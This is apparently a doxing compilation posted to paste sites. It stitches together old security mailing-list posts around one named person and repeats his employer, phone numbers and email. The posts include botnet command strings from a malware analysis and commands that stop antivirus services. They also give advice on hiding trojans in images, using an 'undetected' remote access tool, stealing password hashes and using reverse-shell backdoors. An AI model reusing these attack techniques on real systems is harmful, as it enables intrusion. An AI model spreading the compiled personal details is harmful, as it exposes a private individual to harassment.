He captured them with squil (http://sguil.sourceforge.net/).

Chas is working with Shadowserver to identify better ways to
trackdown/takedown botnets.

*The credit should go to him and Shadowserver*.

Shadowserver has been a responsible and essential part of recent
Internet security activities.

As anti virus vendors have been notified will soon do a write-up on it,
I see no reason not to publicize it here.

MD5:
c2576aeff0fd9267b6cc3a7e1089e05d ~/samples/derfiq
e9a2b13fe02d013cc5e11ee586d11c38 ~/samples/session

We are not quite sure as of yet exactly what this does, it can be a
Linux virus, a Linux Trojan horse, a Linux worm... we are not even sure
if the checksums above are useful at all. We hope to know more soon and
we will update as we do.

There are some interesting strings to be noted:

NOTICE %s :TSUNAMI <target> <secs>                          = Special
packeter
that wont be blocked by most firewalls
NOTICE %s :PAN <target> <port> <secs>                       = An
advanced syn
flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder
NOTICE %s :UNKNOWN <target> <secs>                          = Another
non-spoof udp flooder
NOTICE %s :NICK <nick>                                      = Changes
the nick
of the client
NOTICE %s :SERVER <server>                                  = Changes
servers
NOTICE %s :GETSPOOFS                                        = Gets the
current
spoofing
NOTICE %s :SPOOFS <subnet>                                  = Changes
spoofing
to a subnet
NOTICE %s :DISABLE                                          = Disables all
packeting from this client
NOTICE %s :ENABLE                                           = Enables all
packeting from this client
NOTICE %s :KILL                                             = Kills the
client
NOTICE %s :GET <http address> <save as>                     = Downloads
a file
off the web and saves it onto the hd
NOTICE %s :VERSION                                          = Requests
version
of client
NOTICE %s :KILLALL                                          = Kills all
current packeting
NOTICE %s :HELP                                             = Displays this
NOTICE %s :IRC <command>                                    = Sends this
command to the server
NOTICE %s :SH <command>                                     = Executes a
command

'session', current detection:
AntiVir            6.33.1.50/20060218            found [BDS/Katien.R]
Avast        4.6.695.0/20060216            found nothing
AVG          718/20060217            found nothing
Avira        6.33.1.50/20060218            found [BDS/Katien.R]
BitDefender        7.2/20060218            found nothing
CAT-QuickHeal            8.00/20060216           found nothing
ClamAV             devel-20060126/20060217             found nothing
DrWeb         4.33/20060218          found nothing
eTrust-InoculateIT             23.71.80/20060218             found nothing
eTrust-Vet         12.4.2086/20060217            found nothing
Ewido        3.5/20060218            found nothing
Fortinet           2.69.0.0/20060218             found nothing
F-Prot             3.16c/20060217          found nothing
Ikarus             0.2.59.0/20060217             found
[Backdoor.Linux.Keitan.C]
Kaspersky          4.0.2.24/20060218             found
[Backdoor.Linux.Keitan.c]
McAfee             4700/20060217           found [Linux/DDoS-Kaiten]
NOD32v2            1.1413/20060217         found nothing
Norman             5.70.10/20060217        found nothing
Panda        9.0.0.4/20060218        found nothing
Sophos             4.02.0/20060218         found nothing
Symantec           8.0/20060218            found [Backdoor.Kaitex]
TheHacker          5.9.4.098/20060218            found nothing
UNA          1.83/20060216           found nothing
VBA32        3.10.5/20060217         found nothing

'derfiq' current detection:
AntiVir            6.33.1.50/20060218            found
[Worm/Linux.Lupper.B]
Avast        4.6.695.0/20060216            found nothing
AVG          718/20060217            found nothing
Avira        6.33.1.50/20060218            found [Worm/Linux.Lupper.B]
BitDefender        7.2/20060218            found nothing
CAT-QuickHeal            8.00/20060216           found nothing
ClamAV             devel-20060126/20060217             found nothing
DrWeb         4.33/20060218          found nothing
eTrust-InoculateIT             23.71.80/20060218             found nothing
eTrust-Vet         12.4.2086/20060217            found nothing
Ewido        3.5/20060218            found nothing
Fortinet           2.69.0.0/20060218             found nothing
F-Prot             3.16c/20060217          found nothing
Ikarus             0.2.59.0/20060217             found
[Net-Worm.Linux.Lupper.B]
Kaspersky          4.0.2.24/20060218             found nothing
McAfee             4700/20060217           found nothing
NOD32v2            1.1413/20060217         found nothing
Norman             5.70.10/20060217        found nothing
Panda        9.0.0.4/20060218        found nothing
Sophos             4.02.0/20060218         found nothing
Symantec           8.0/20060218            found [Hacktool]
TheHacker          5.9.4.098/20060218            found nothing
UNA          1.83/20060216           found nothing
VBA32        3.10.5/20060217         found nothing

This write-up can be found here:
http://blogs.securiteam.com/index.php/archives/303

We will notify as we get new updates here:
http://blogs.securiteam.com

             Gadi.

--
http://blogs.securiteam.com/

"Out of the box is where I live".
             -- Cara "Starbuck" Thrace, Battlestar Galactica.


  By Date           By Thread  
Current thread:

    new linux malware Gadi Evron (Feb 20)
        Re: new linux malware Christine Kronberg (Feb 21)
            PHP as a secure language? PHP worms? [was: Re: new linux malware] Gadi Evron (Feb 22)
                Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Christine Kronberg (Feb 21)
                Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Thomas M. Payerle (Feb 26)
                Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Kevin Waterson (Feb 24)
                Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jamie Riden (Feb 26)
                Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Matthew Schiros (Feb 26)
        Re: new linux malware Marco Monicelli (Feb 21)
            Re: new linux malware Gadi Evron (Feb 22)
                Re: new linux malware Jamie Riden (Feb 23)






--------------------------------------------------------------------------------------------------------




Exhibit D:  https://bugtraq.securityfocus.narkive.com/AkKZ5lW3/trend-micro-officescan-for-win2k-strange-behaviour




Discussion:
Trend Micro Officescan for Win2k strange behaviour
(too old to reply)
Marco Monicelli
17 years ago
Permalink
Hello List!

I've noticed the following "weird" behaviour of the Trend Micro Officescan
client vers. 5.58 update to pattern 1.936.00 Engine 7.100 for WinXP/2k/NT:

The AV client is protected for unloading the Realtime Scan agent prompting
for a password (which I don't know of course). Moreover I have NOT admin
rights which allows me to perform a full system scan but not to unload the
client and/or the realtime protection.
Playing with the "net" command on a DOS prompt, I found out that the AV
launches itself and the realtime prot as services automatically. Then I
tried to stop the services with the simple command

net stop "OfficeScanNT Listener"
net stop "OfficeScanNT RealTime Scan"

Guess what? The two services have been successfully stopped from my system.

What do you guys think of this? Should I advise the AV Company of this or
this is normal behaviour?

Tnx for feedback.

Ciao

Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: ***@marcegaglia.com
Seth Hall
17 years ago
Permalink
Marco,

You don't have to be an administrator of the local machine to start and
stop services.

By default, members of the Power Users group have the ability to stop
and start services on their local computer, which is probably what you
are logged on as. Members of the Users group cannot, by default, stop
and start services. I was able to stop my officescan service from a
Power User account, but not from a User account (just checked to make
sure Trend hadn't put in any proprietary settings).

Your net admin should either not be giving out power user status or
should be locking down services so that members of the Power Users group
cant control their stop/start (which may or may not be possible).

Trend is powerless against incorrect configuration, I'd imagine.

/Seth Hall


-----Original Message-----
From: Marco Monicelli [mailto:***@marcegaglia.com]
Sent: Wednesday, July 14, 2004 2:28 AM
To: ***@securityfocus.com
Subject: Trend Micro Officescan for Win2k strange behaviour
Importance: High





Hello List!

I've noticed the following "weird" behaviour of the Trend Micro
Officescan
client vers. 5.58 update to pattern 1.936.00 Engine 7.100 for
WinXP/2k/NT:

The AV client is protected for unloading the Realtime Scan agent
prompting
for a password (which I don't know of course). Moreover I have NOT admin
rights which allows me to perform a full system scan but not to unload
the
client and/or the realtime protection.
Playing with the "net" command on a DOS prompt, I found out that the AV
launches itself and the realtime prot as services automatically. Then I
tried to stop the services with the simple command

net stop "OfficeScanNT Listener"
net stop "OfficeScanNT RealTime Scan"

Guess what? The two services have been successfully stopped from my
system.

What do you guys think of this? Should I advise the AV Company of this
or
this is normal behaviour?

Tnx for feedback.

Ciao

Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: ***@marcegaglia.com
3APA3A
17 years ago
Permalink
Dear Marco Monicelli,

--Wednesday, July 14, 2004, 1:28:24 PM, you wrote to ***@securityfocus.com:

MM> Playing with the "net" command on a DOS prompt, I found out that the AV

...

MM> net stop "OfficeScanNT Listener"
MM> net stop "OfficeScanNT RealTime Scan"

It's bug of any automated system. It's documented as "Kiddie with
elevated privileges can make any protection unusable". Windows is very
vulnerable to this problem.
--
~/ZARAZA
Ну а теперь, Уильям, хорошенько поразмыслите над данным письмом. (Твен)




--------------------------------------------------------------------------------------------



Exhibit E:  http://www.blacksheepnetworks.com/security/resources/pentest/6537.html  (A continuance from Exhibit A)





RE: Hacking to Xp box

From: Marco Monicelli (marco.monicelli@marcegaglia.com)
Date: Mon Sep 05 2005 - 13:46:15 EDT

    Next message: Dario Ciccarone (dciccaro): "RE: Nortel Contivity 2600"
    Previous message: Marco Ivaldi: "Re: Multiple Spoofed HTTP Requests"
    In reply to: Eduardo Suzuki: "RE: Hacking to Xp box"
    Next in thread: chad@mr-lew.com: "RE: Hacking to Xp box"
    Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ] 

Dear Eduardo/list,

I didn't discuss the fact that a server is much more juicy to hit for an
hacker than the simple workstation, even if it is the CEO box. Once stated
this, we can proceed with the next point.

First, SP2's firewall can by easily bypass as mostly firewalls with
injection techinque. Infact they normally tend to allow HTTP traffic for
example. If the firewall doesn't block ICMP, you can use some ICMP backdoor
which replies to a special crafted packet ICMP ping with a reverse connect
shell. If you get admin privilegies on that box, you can even think to stop
the firewall service on that machine. If the RAW sockets limit is your
problem, you can easily ENABLE back the raw sockets with some right command
lines (google is your best friend once again).

Regarding the JPG/GIF question, there are many joiner/merger on the net
which are not recognized by AV and they can hide an EXE file inside the
Picture. Once the guy opens the pic, then the EXE is excecuted hiddenly and
secretly. I'm not taking into consideration the buffer overflow
vulnerability as it is now a bit too old to be exploited (expecially on a
fully patched machine). So the trick is just that a "not really expert" guy
will prolly open a picture (curiosity helps hackers a lot) and get infected
easily without exploiting any vulnerability. I call this "curiosity
engeneering".... ehehehhehe....

HXDEF is correctly a rootkit which means you first have to get admin rights
on the target box. I've suggested that in order to mention rootkits which
can be useful to an hacker, once he got admin privilegies. Did you ever see
this file "hxdef defeating modern detectors.rar"? It is a movie which shows
how it is NOT detected by most of the rootkit's hunters. But maybe that
movie is not updated and you're right (I couldn't test it unfortunately).

Anyway, the main point to show the CEO the insecurity of the box is to get
ADMIN privilegies over there. Then you can choose the game you wanna play
on that computer.

I'm opened to any further suggestion, tnx for yours Eduardo.

Cheers

Marco

             Hi, Marco!

             IMO, I think it's harder to attack a workstation compared to a
server through a network, since servers must have some open port in
listening state. On a workstation the user is the weakest point most of the
time, while on a server there are many other parts to take into account. If
there is a firewall in place (for example, the one that comes with XP SP2),
which attacks are possible through a network? AFAIK just a few. Windows XP
restricts most of the attacks that use anonymous connections. Service Pack
2
restricts even more. If you are a domain admin, there are many
possibilities, but that's not the case here.
             What do you mean by "executing a jpg or a gif file"? I know
there
are buffer overflow vulnerabilities that can be exploited when opening an
image, but it's not a trivial attack. I'm not sure (because I didn't try
it), but I think it's even harder to do it when you need to merge an
executable into an image using a joiner. I'd like to know what you think
about it.
             Regarding the hxdef rootkit, you can find it out by using
RootKitRevealer from SysInternals. It's available at
http://www.sysinternals.com/Utilities/RootkitRevealer.html. BTW, hxdef
isn't
considered an attack tool. It's used after you successfully got access to a
computer, when you want to hide files, open ports and so on.
             Just my $0.02.
             Regards,

             Eduardo Suzuki
             esuzuki_br@pop.com.br
             Eduardo.AC.Suzuki@gmail.com

"The essential is invisible to the eyes."

-----Original Message-----
From: Marco Monicelli [mailto:marco.monicelli@marcegaglia.com]
Sent: Friday, September 02, 2005 6:12 AM
To: Juan B
Cc: pen-test@securityfocus.com
Subject: Re: Hacking to Xp box
Importance: High

Ciao juan!

If the CEO box is fully patched and FW is enabled, then your mission is a
little bit more difficult to accomplish. Besides, there are thousands of
recent exploits for windows which you can try. For example, did you try the
Universal exploit for the Plug and Play vulnerability? It is published
everywhere. You can try with more recent exploits than the DCOM exploit
which is at least 3 years old.

If you want to try with the trojan, I would suggest you to google for
Bifrost, which is a Remote Administration Tool (you can call it trojan if
you prefer) that is completely UNDETECTED by any AV (at the moment it is
still 100% undetected). You can pack it inside any file (exe, jpg, gif....)
and it will be executed silently and hiddenly. Moreover, Bifrost can bypass
firewalls injecting itself into Explorer.exe process. Another good
UNDETECTED tool is hxdef rootkit.

Arp poisoning could do the job but why not trying to steal the SAM file and
to crack it? You can do that remotely if the machine has the ports you
mentioned opened. I bet you know some tool to steal the SAM and to crack
it. I love SAMDUMP for example. ;)

Last but not least, you can try with a Denial of Service to show your CEO
how easily a kid can prevent you from working with a simple DoS.

Why not sniffing the network? There are many undetected sniffers around the
Web.

Just my 2 cents ;)

Marco

Hi Guys

Please give me a hend here.

Im trying to penetrate the CEO box to show him why we
need better security in our company, he told me to
show me how it can be done. he has xp pro sp 2
with all the pathches installed and FW enbled but I
cant ! I tried to use metasploit with the ms rpc dcom
exploit but it didnt worked. nessus found port 135 139
2000 and ntp are opened and also he can read some smb
shares and also outputed that this host doesnt disgard
SYN packets that have the FIN flag set. and port 2000
(callback is open).
what I can try more to break this box? any ideas? I
know I
allways can try to arp poison his arp table and pass
all the machines traffic throw my laptop to capture
some passwords but this is enough. or send him a
trojan but we have a good anti virus protection .

Does some of you have Ideas ?

Thanks a lot !

Juan

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

----------------------------------------------------------------------------

--
Audit your website security with Acunetix Web Vulnerability Scanner:
Hackers are concentrating their efforts on attacking applications on your
website. Up to 75% of cyber attacks are launched on shopping carts, forms,
login pages, dynamic content etc. Firewalls, SSL and locked-down servers
are
futile against web application hacking. Check your website for
vulnerabilities
to SQL injection, Cross site scripting and other web attacks before hackers
do!
Download Trial at:
http://www.securityfocus.com/sponsor/pen-test_050831
----------------------------------------------------------------------------
---
----------------------------------------------------------------------------
--
Audit your website security with Acunetix Web Vulnerability Scanner:
Hackers are concentrating their efforts on attacking applications on your
website. Up to 75% of cyber attacks are launched on shopping carts, forms,
login pages, dynamic content etc. Firewalls, SSL and locked-down servers
are
futile against web application hacking. Check your website for
vulnerabilities
to SQL injection, Cross site scripting and other web attacks before hackers
do!
Download Trial at:
http://www.securityfocus.com/sponsor/pen-test_050831
----------------------------------------------------------------------------
---
------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner: 
Hackers are concentrating their efforts on attacking applications on your 
website. Up to 75% of cyber attacks are launched on shopping carts, forms, 
login pages, dynamic content etc. Firewalls, SSL and locked-down servers are 
futile against web application hacking. Check your website for vulnerabilities 
to SQL injection, Cross site scripting and other web attacks before hackers do! 
Download Trial at:
http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------







Exhibit F:   https://marc.info/?l=bugtraq&m=108991985612069&w=2





[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Trend Micro Officescan for Win2k strange behaviour
From:       Marco Monicelli <marco.monicelli () marcegaglia ! com>
Date:       2004-07-14 9:28:24
Message-ID: OFF477B9CD.96AC5FC0-ONC1256ED1.00334DA6-C1256ED1.00340A3A () marcegaglia ! com
[Download RAW message or body]





Hello List!

I've noticed the following "weird" behaviour of the Trend Micro Officescan
client vers. 5.58 update to pattern 1.936.00 Engine 7.100 for WinXP/2k/NT:

The AV client is protected for unloading the Realtime Scan agent prompting
for a password (which I don't know of course). Moreover I have NOT admin
rights which allows me to perform a full system scan but not to unload the
client and/or the realtime protection.
Playing with the "net" command on a DOS prompt, I found out that the AV
launches itself and the realtime prot as services automatically. Then I
tried to stop the services with the simple command

net stop "OfficeScanNT Listener"
net stop "OfficeScanNT RealTime Scan"

Guess what? The two services have been successfully stopped from my system.

What do you guys think of this? Should I advise the AV Company of this or
this is normal behaviour?

Tnx for feedback.

Ciao

Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: marco.monicelli@marcegaglia.com

[prev in list] [next in list] [prev in thread] [next in thread] 






----------------------------------------------------------------

Mirrors: 

https://doxbin.org/user/LarpKillaz

https://controlc.com/0b2e78bb

https://skidbin.net/paste/Ug45GeKjMF

https://ghostbin.com/paste/eQ8LT





End of Log

-----------------------------------------------------------------------------







       ~BWA~  



"The House Always Wins"